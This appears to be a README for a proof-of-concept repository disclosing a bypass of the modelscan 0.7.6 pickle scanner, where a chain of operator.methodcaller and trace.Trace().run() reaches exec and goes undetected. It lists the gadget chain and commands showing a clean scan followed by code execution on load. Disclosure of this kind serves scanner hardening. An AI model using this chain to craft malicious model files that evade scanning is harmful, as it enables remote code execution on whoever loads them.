Add README with vulnerability details

1822a08 verified about 2 months ago

970 Bytes

license: mit

Modelscan Bypass PoC — trace.Trace().run()

Vulnerability

Modelscan 0.7.6 fails to detect malicious pickle files that use trace.Trace().run() for arbitrary code execution.

The trace module is not in modelscan's unsafe_globals blocklist. trace.Trace().run(stmt) internally calls exec(compile(stmt)), enabling full RCE.

Chain

operator.methodcaller('run', '<malicious_code>') — not blocked (only attrgetter is blocked)
trace.Trace() — not blocked
methodcaller(trace_instance) → calls trace_instance.run(stmt) → exec(compile(stmt))

Reproduction

modelscan scan -p pytorch_model.bin
# Result: "No issues found"

python3 -c "import pickle; pickle.loads(open('pytorch_model.bin','rb').read())"
# Result: Arbitrary code execution

Impact

Full RCE on any system that loads this model file via torch.load() or pickle.loads().

Modelscan Version

0.7.6 (latest as of 2026-04-05)